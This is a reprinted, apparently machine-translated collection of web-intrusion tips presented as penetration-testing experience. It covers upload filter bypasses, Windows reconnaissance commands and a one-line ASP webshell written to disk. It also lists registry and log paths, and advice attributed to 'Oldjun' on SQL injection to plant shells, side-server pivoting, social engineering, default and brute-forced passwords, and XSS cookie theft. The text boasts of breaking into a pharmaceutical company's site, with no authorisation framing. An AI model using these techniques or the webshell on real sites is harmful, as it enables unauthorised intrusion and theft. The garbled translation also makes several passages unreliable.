Web Penetration Testing experience skills (full) [reprint]

Nuclear ' ATK organized by:

Upload a bug take the shell:

1. Directly upload asp.asa.jsp.cer.php.aspx.htr.cdx .... And so on, get the shell.
2. Just add a space after the suffix or add a few points at the time of uploading, and perhaps there will be surprising discoveries. Example: *.asp, *.asp ...
3. Upload with dual extension for example: *.jpg.asa format (can also be used with the 2nd).
4.gif File Header Spoofing
5. Duplicate upload with same name is also OK. ：

The commands used in intrusion infiltration, syntax:

Set,systeminfo,ipconfig,ping, use these commands to receive more system information
Tasklist/svc View the PID of the service
Netstat-ano,netstat-abnv
Fsutil.exe fsinfo drives list all drive characters
Dir d:\*conn*.*/s Find database Connection file
Telnet 218.25.88.234 3389 to external whether this port is open
echo ^<%execute (Request ("cmd"))%^> >>e:\k\x.asp Write a word to the E:\k\ directory, with a password of CMD.
Type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp transfer d:\wwwroot\web\ under K6.asp to d:\wwwroot\123\ renamed to A.asp

Registry sensitive information:

Hkey_local_machine\software\mysql ab\ MySQL Registry Location
Hkey_local_machine\software\hzhost\config\ China Host Location
Hkey_local_machine\software\cat soft\serv-u\ serv-u Location
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal server\wds\rdpwd\tds\tcp\portnamber 3389 Port
Hkey_local_machine\system\controlset001\services\tcpip\parameters 1433 Port
Hkey_local_machine\system\controlset001\services\msftpsvc\parameters\virtual Roots\ Server FTP path

Server log file physical path:

Security log file:%SystemRoot%\System32\Config \secevent.evt
System log files:%SystemRoot%\System32\Config \sysevent.evt
Application log files:%SystemRoot%\System32\Config \appevent.evt
FTP connection log and HTTPD transaction log: systemroot% \system32\logfiles\, the following sub-folders, respectively, should be FTP and Web service log, the corresponding suffix name. Log.
Norton Antivirus log: C:\Documents and Settings\All Users\Application Data\symantec

Oldjun Daniel writes the experience of invading websites:

The following talk about the experience of personal invasion, no language, only talk about taking Webshell, as to the right, here do not say, I also rarely mention the right, unless indeed necessary! ~

1. No matter what station, no matter what language, I want to penetrate, the first thing is to sweep the directory, the best to sweep out an upload point, directly upload the shell, you do not laugh, sometimes you spend a long time to make a station, finally found that there is a ready upload point, and it is easy to guess, but this situation occurs in the ASP

2.asp (ASPX) +mssql first consider injection, the general injection has Dbowner permissions can directly write the shell, if not write, or the Web and database separation, then guess the data, from the background, can upload or change the configuration file;

3.asp (aspx) +access shell generally only 3 methods, one is the front desk upload or inject into the background upload, the second is injected into the background to change the configuration file, and the third is to inject into the background backup database or Bauku know is ASP or ASA database then directly write a sentence;

4.php+mysql is generally injected into the background upload, occasionally luck better enough to inject select into OutFile, and then include, sub-local and remote, remote included in the high version of PHP is not supported, so try to local upload image files or write to log And then a PHP program such as an open loophole, good luck can directly write shell.

5.jsp+mysql use the database to get access to basic with PHP, and JSP upload basically rarely check file suffix, so as long as there is injection point and backstage, take the shell quite easy. Jsp+oracle Station I met not much, encountered is also guessed the user name and password from the background.

6. No matter what major stations, the main station is generally very safe (or early to play), so generally from the two-level domain name, guess the main station some user name and password or get the source code of the main station, or the side note to obtain the same network segment server after Cain or ARP.

7. The general station is seldom useful in the existing CMS, so if you are fortunate to find the source code, then you sent, inject loopholes ah, upload loopholes ah, write file loopholes Ah, are in your hands. Take a look at those big station new out of the test sub-site, those stations are still in the test, you can easily win.

8. The upload has a file name truncation, which includes 2 aspects, one is 00 truncation, two is a long file name truncation (once used to get the HW); and then a lot of writing files in the place, can be 00, all the time. Upload do not forget. asp (of course, ASA,.CER,.CDX) the magical content of the catalogue.

9.php Station regardless of Windows or Linux, there is a MAGIC_QUOTES_GPC problem, when the MAGIC_QUOTES_GPC is on, when the server variable injection can still select into OutFile, This year I have worked on a non-open source CMS is the case, in general, do not consider writing files, but have this permission do not forget to read the file source, because the parameters of load_file can be encoded.

10. Guess the path or file in the intrusion is necessary, guess the path of the time do not forget Google (Baidu is too bad, Google is full), so you can consider the site under the Robot.txt or robots.txt, there will be surprises.

11. The use of tools is very important, before the invasion with Wvs sweep will help the invasion; Although many of the injection tools, but not all, now the soft and hard firewall, anti-injection more and more serious, then you do not lazy, more manual help you grow.

12. Have met the first-class monitoring, encountered other anti-post firewall, sometimes a word into the big horse can not be transmitted, then, you learn to code, learn to change around.

13. Want to engage in general station, remember to check the copyright of this site, look for the company, and then from this company to do the other station, get the source code back to engage, I used this method to win a well-known pharmaceutical company station.

14. The idea of the side note is never outdated, encountered Dbowner injection, can be very comfortable to write the shell to the station you need, save trouble to mention the right, bad luck, step by step with the shell to get what you need.

15. Never forget the social engineering, use social workers to treat themselves as a person who does not, from the QQ, ID card, mailbox and so on, may sometimes have accidents; and don't forget admin,admin;test,test;123456, 123456 This simple attempt, of course, you can also brute force hack.

16. Do not neglect XSS, do not neglect cookie,xss can steal cookies, but also a number of magical, learn to understand; Cookies can be forged, cookies can be injected, and cookies can be injected around the vast majority of firewalls.

17. Usually do station more collect path Ah, source Ah, tools ah, enrich their "weapons" library; it is best to record their invasion steps, or after the reflection, I generally remember in txt, in addition to do extrapolate.

18. Learn more, look at the source code, look at the published 0day, the script is the premise of intrusion, not the tool, will use the tool will be installed B you have not yet started.

Web Penetration Testing experience skills (full) [reprint]